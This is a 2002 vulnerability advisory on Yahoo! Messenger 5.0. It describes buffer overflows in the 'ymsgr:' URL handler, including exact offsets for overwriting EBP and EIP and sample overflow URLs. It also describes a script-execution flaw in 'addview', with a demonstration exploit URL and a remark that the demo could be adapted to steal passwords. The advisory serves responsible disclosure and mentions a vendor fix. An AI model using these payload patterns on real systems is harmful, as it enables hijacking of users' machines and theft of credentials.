Yahoo Messenger - Multiple Vulnerabilities

[Phuong Nguyen <dphuong () yahoo com>]

Yahoo! Instant Messenger (YIM) Hi-Jack 101-- Multiple
Vulnerabilities & Demonstration Exploit

Date        : 05/02/2002
Version     : Yahoo! Messenger (5, 0, 0, 1061) [latest
build at time]
Platforms   : Win98, Win2K, XP Pro (and likely all
Windows versions)
Severity    : Medium - High

Contents    :
01. Summary
02. Software/Supplier Status
03. Vulnerability #1: Buffer Overflows
04. Vulnerability #2: Yahoo! Instant Messenger (YIM)
Hi-Jack 101
     (Remote Java Visual Basic script execution)
05. Threat Significance 
06. Credits


01. Summary: 

At the end of 2001, Yahoo! Instant Messenger (YIM) was
estimated by Jupiter Media Metrix to the ad-sponsored
choice of some 12 million Instant Messaging (IM)
Internet users whose numbers are increasing at over
25% per annum,
http://www.ecommercetimes.com/perl/story/14793.html. 

Media Life, however, estimates the number of global IM
users at the end of 2001 to be over 200 million with
32%, or 64 million, using Yahoo! Messenger,
http://209.61.190.23/news2002/feb02/feb04/2_tues/news4tuesday.html.

Security vulnerabilities in YIM have recently been
found which can allow unauthorized execution of
programs on a YIM user's PC via buffer overflows or
Java or Visual Basic script execution added through
YIM Content tabs. The net impact is to allow a
relatively simple opportunity to hijack users' YIM
client outright, and use it to attack or intrude into
YIM users supposedly private information systems. 

02. Software/Supplier Status:

Yahoo! was informed of this vulnerability on
05/05/2002. In discussions with Yahoo Security the
authors agreed to await Yahoo!'s release of a repaired
version of Yahoo! Messenger (YIM). Yahoo! made the
repaired version available for download and
installation on 24/05/2002 at
http://download.yahoo.com/dl/installs/ymsgr/ymsgr_1065.exe.


Notably, Yahoo! removed some functionality from
repaired YIM version. Specifically, according to
Yahoo, the "addview" function (see below) has been
removed until Yahoo! can rewrite it and provide
sufficient security to preven exploitation of the
Vulnerability #2 below. 


03. Vulnerability #1: Buffer Overflows

When YaHoo! Messenger (YIM) is installed, it registers
its own handler for URLs of the type "ymsgr". For
example, in the Win98 Registry, this handler is
HKEY_LOCAL_MACHINE\Software\CLASSES\ymsgr\shell\open\command
which has a value for "(Default)" of
"<Hard-drive:\Directories\>YPAGER.EXE %1".

Thus when any URL beginning with "ymsgr:" [no slashes,
no "//"] is input into a web browser supported by
integrated with YIM, "ypager.exe %1" is executed on
the complete URL.

With no proper bounds checking in the ymsgr protocol,
attackers can overflow the YIM function calls "call",
"sendim", "getimv", "chat", "addview", "addfriend"
tags.

For example, loading URL
"ymsgr:call?(84)+8-8344332&p=DaHØ" into a
YIM-integrated browser will cause ypager.exe will be
executed and it will then execute the YIM/Net2Phone
"Call Centre" application and prepare it to dial the
phone number and name in the URL.

If we input a string that has more than 260 bytes we
will crash YIM; 264 bytes will overwrite the EBP
register; four (4) more bytes will overwrite the EIP
register. In total, 268 bytes are needed to cause a
buffer overflow.

For example, this URL

    ymsgr:call?+<aaaaaaaaaaaaaaaa...>

would overwrite both the EBP (Extended Base Pointer)
and EIP (Extended Instruction Pointer). The elipsis,
"...", represents an extension to 268 bytes, e.g,
0x61616161, of "a"s). From there, attackers could
overwrite the EIP with any location in memory they
choose, jump to their exploit code and have the code
run under the current user's normal privileges.

The following are susceptible to BOFs (Buffer
OverFlows) as well. But this time we need to punch in
another 100 bytes:

    ymsgr:sendim?+<aaaaaaa..... 368 bytes here>
    ymsgr:chat?+<aaaaaaa..... 368 bytes here>
    ymsgr:addview?+<aaaaaaa..... 368 bytes here>
    ymsgr:addfriend?+<aaaaaaa..... 368 bytes here>

Another susceptibility is illustrated by
"ymsgr:getimv?+<aaaaaaa..... 368 bytes here>", as
reported to BugTraq on February 21, 2002 by "Scott
Woodward" <scott () phoenixtechie com>. We include it in
here in case anyone wants an example of this
particular exploit.


04. Vulnerability #2: Yahoo! Instant Messenger (YIM)
Hi-Jack 101 
    (Java, Visual Basic script execution)

URLs beginning with "ymsgr:addview?" let users add
browser-ready Yahoo! content to YIM's "Content Tabs"
for viewing in YIM, without a web browser. YIM
installs with default Tabs for Stocks, Weather,
Calendar, News, etc.

The following URL is provided to demonstrate this
vulnerability. To use it, you must have YaHoo!
Messenger (YIM) installed and integrated with a
compatible web browser. (We only tested this exploit
on Microsoft's Internet Explorer 5.0+.)

ymsgr:addview?http://rd.yahoo.com/messenger/?http://viceconsulting.com/cons/servs/infosec/yimvul001/DemH0.htm

This simple, completely harmless, sample exploit will
start up YIM, if not already started, add a new
"Content Tab" called "YIM Cal-Hack" to YIM's current
set, then display a dialogue box with one option,
"OK", then open the "YIM Cal-Hack" content, a quick,
9-click set of instructions to disable the exploit.
(Send it to your friends for a laugh. ;))

To see the contents of DemH0.htm, simply remove the
Yahoo! redirection parts of the exploit URL above or
load this URL into any browser:

http://viceconsulting.com/cons/servs/infosec/yimvul001/DemH0.htm


Note, however, that to completely remove the "YIM
Cal-Hack" (before the user's next YIM upgrade a minor
Windows registry edit is needed: simply exit YIM;
"Find" the text string "YMSGR_test" or "YIM Cal-Hack",
using Start-> Run->regedit->Edit->Find; then delete
the YMSGR_test key; exit regedit; and restart YIM.

Note also that DemH0.htm is not a standard HTML file
-- though it calls three other standard HTML files.
Instead, DemH0.htm contains only YIM- specific tags.
In fact, if you insert the normal HTML opening tags,
"<html> <head><script>...", the exploit will not work
and YIM will simply respond with a dialogue box
stating, "Error adding view... The view format is
invalid." -- as demonstrated by this URL:

ymsgr:addview?http://rd.yahoo.com/messenger/?http://viceconsulting.com/cons/servs/infosec/yimvul001/DemH0.not.htm


05. Threat Significance

Vulnerability #2 (above) demonstrates how potential
attackers could replace or even visually replicate
almost any YIM content and insert scripts into their
own HTML that could be used to do almost anything on a
YIM users machine. For example, it would not be too
difficult to modify the demonstration exploit above to
request a YIM user's ID and password and send it to
any email address or Internet URL.

Minimum user intervention is required to exploit these
vulnerabilities. Modifications of the ymsgr URLs
provided about coulg readily be hidden in HTML pages
or emails with text or images enticing YIM users to
click on them. Further, scripts could be used to load
such ymsgr-exploit URLs into pop-up browser windows
with no direct user intervention.

Given there are now somewhere between 13-65 million
Yahoo! Messenger users worldwide (as described in the
Summary above), the potential impact of this
vulnerability poses a highly significant threat to
users who do not soon upgrade their Yahoo! Messenger
clients.


06. Credits:

VICE Consulting, Technical: Phuong Nguyen
VICE Consulting, Editorial: AD Marshall



__________________________________________________
Do You Yahoo!?
Yahoo! - Official partner of 2002 FIFA World Cup
http://fifaworldcup.yahoo.com